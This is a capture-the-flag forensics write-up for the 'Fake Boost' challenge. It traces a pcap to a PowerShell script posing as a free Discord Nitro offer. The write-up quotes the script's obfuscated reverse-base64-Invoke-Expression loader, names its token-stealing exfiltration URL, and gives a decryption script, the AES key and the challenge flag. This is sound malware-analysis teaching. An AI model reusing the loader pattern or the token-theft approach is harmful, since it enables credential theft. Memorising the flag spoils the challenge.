Fake Boost
Challenge Description :
In the shadow of The Fray, a new test called ""Fake Boost"" whispers promises of free Discord Nitro perks. It's a trap, set in a world where nothing comes without a cost. As factions clash and alliances shift, the truth behind Fake Boost could be the key to survival or downfall. Will your faction see through the deception? KORP™ challenges you to discern reality from illusion in this cunning trial.we have a pcap file to analyze. first thing let's open it using wireshark and the first thing let's view the protocol hirarchy on the statistics tab
and we can see http
so let's filter by http, we have two interesting endpoints
let's start by the first one /freediscordnitro , right click and follow HTTP Stream
and we can see that this endpoints downloads a powershell script called discordnitro.ps1
$s0yAY2gmHVNFd7QZ = $jozeq3n.ToCharArray(): This line converts a variable$jozeq3ninto an array of characters and assigns it to$s0yAY2gmHVNFd7QZ.[array]::Reverse($s0yAY2gmHVNFd7QZ): This reverses the order of elements in the array.-join $s0yAY2gmHVNFd7QZ 2>&1> $null;: This line joins the array elements back into a single string and deletes any error output.$LOaDcODEoPX3ZoUgP2T6cvl3KEK = [sYSTeM.TeXt.ENcODING]::UTf8.geTSTRiNG([SYSTEm.cOnVeRT]::FRoMBaSe64sTRing("$s0yAY2gmHVNFd7QZ")): This line decodes a base64 encoded string stored in$s0yAY2gmHVNFd7QZ.$U9COA51JG8eTcHhs0YFxrQ3j = "Inv"+"OKe"+"-EX"+"pRe"+"SSI"+"On": This line creates a string variable with value "Invoke-Expression".New-alIaS -Name pWn -VaLuE $U9COA51JG8eTcHhs0YFxrQ3j -FoRcE: This line creates an aliaspWnfor the command Invoke-Expression.pWn $lOADcODEoPX3ZoUgP2T6cvl3KEK: This line invokes the command stored in$LOaDcODEoPX3ZoUgP2T6cvl3KEK, which is decoded PowerShell code.
so we will execute the powershell script until the 4th part since the rest executes the script using Invoke-Expression command
copying line by line into powershell command prompt
copy the whole powershell script into notepad++ or any text editor to analyze the code.
in bref this code is malicious which steals Discord tokens and other sensitive information from various locations on a user's system, including web browser data directories. It then attempts to retrieve Discord user information using these stolen tokens. Additionally, it generates Discord Nitro codes and sends the stolen information encrypted to the URL http://192.168.116.135:8080/rj1893rj1joijdkajwda
so we have to get the encryptedData sent and try to decrypt it, previously on wireshark http traffic we have showcased 2 interesting endpoints the first one was used to download the malicious powershell script and the second one which is /rj1893rj1joijdkajwda is used by the malious script to send encryptedData stolen from the victim.
right click follow http stream on this endpoint and we can see the encryptedData sent
to decrypt this we have to reverse the maliocus discordnitro.ps1 powershell script encryption logic
function Decrypt-String($key, $encryptedBase64) {
$fullData = [System.Convert]::FromBase64String($encryptedBase64)
$iv = $fullData[0..15]
$encryptedData = $fullData[16..($fullData.Length - 1)]
$aesManaged = Create-AesManagedObject $key $iv "CBC" # Ensure the mode is correct
$decryptor = $aesManaged.CreateDecryptor()
$decryptedData = $decryptor.TransformFinalBlock($encryptedData, 0, $encryptedData.Length)
[System.Text.Encoding]::UTF8.GetString($decryptedData)
}
function Create-AesManagedObject($key, $IV, $mode) {
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
# Setting the mode according to the provided mode parameter
if ($mode -eq "CBC") { $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC }
elseif ($mode -eq "CFB") { $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CFB }
elseif ($mode -eq "CTS") { $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CTS }
elseif ($mode -eq "ECB") { $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::ECB }
elseif ($mode -eq "OFB") { $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::OFB }
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
if ($IV) {
if ($IV.GetType().Name -eq "String") {
$aesManaged.IV = [System.Convert]::FromBase64String($IV)
}
else {
$aesManaged.IV = $IV
}
}
if ($key) {
if ($key.GetType().Name -eq "String") {
$aesManaged.Key = [System.Convert]::FromBase64String($key)
}
else {
$aesManaged.Key = $key
}
}
$aesManaged
}
$encryptedData = "bEG+rGcRyYKeqlzXb0QVVRvFp5E9vmlSSG3pvDTAGoba05Uxvepwv++0uWe1Mn4LiIInZiNC/ES1tS7Smzmbc99Vcd9h51KgA5Rs1t8T55Er5ic4FloBzQ7tpinw99kC380WRaWcq1Cc8iQ6lZBP/yqJuLsfLTpSY3yIeSwq8Z9tusv5uWvd9E9V0Hh2Bwk5LDMYnywZw64hsH8yuE/u/lMvP4gb+OsHHBPcWXqdb4DliwhWwblDhJB4022UC2eEMI0fcHe1xBzBSNyY8xqpoyaAaRHiTxTZaLkrfhDUgm+c0zOEN8byhOifZhCJqS7tfoTHUL4Vh+1AeBTTUTprtdbmq3YUhX6ADTrEBi5gXQbSI5r1wz3r37A71Z4pHHnAoJTO0urqIChpBihFWfYsdoMmO77vZmdNPDo1Ug2jynZzQ/NkrcoNArBNIfboiBnbmCvFc1xwHFGL4JPdje8s3cM2KP2EDL3799VqJw3lWoFX0oBgkFi+DRKfom20XdECpIzW9idJ0eurxLxeGS4JI3n3jl4fIVDzwvdYr+h6uiBUReApqRe1BasR8enV4aNo+IvsdnhzRih+rpqdtCTWTjlzUXE0YSTknxiRiBfYttRulO6zx4SvJNpZ1qOkS1UW20/2xUO3yy76Wh9JPDCV7OMvIhEHDFh/F/jvR2yt9RTFId+zRt12Bfyjbi8ret7QN07dlpIcppKKI8yNzqB4FA=="
$AES_KEY = "Y1dwaHJOVGs5d2dXWjkzdDE5amF5cW5sYUR1SWVGS2k="
# Decrypt the encrypted data
$decryptedData = Decrypt-String -key $AES_KEY -encryptedBase64 $encryptedData
# Output the decrypted data
Write-Host "Decrypted data:"
Write-Host $decryptedDataexecuting this script retrieves the encrypted victim data
the Email value is base64 encoded so decoding yeilds the first part of the flag
and this part of the flag hints that the other part will be too easy to find so looking at the malicious powershell script discordnitro.ps1 we can find unused variable called $part1 which holds base64 encoded value. decoding it yeilds the first part of the flag
Flag :
HTB{fr33_N17r0G3n_3xp053d!_b3W4r3_0f_T00_g00d_2_b3_7ru3_0ff3r5}Last updated
Was this helpful?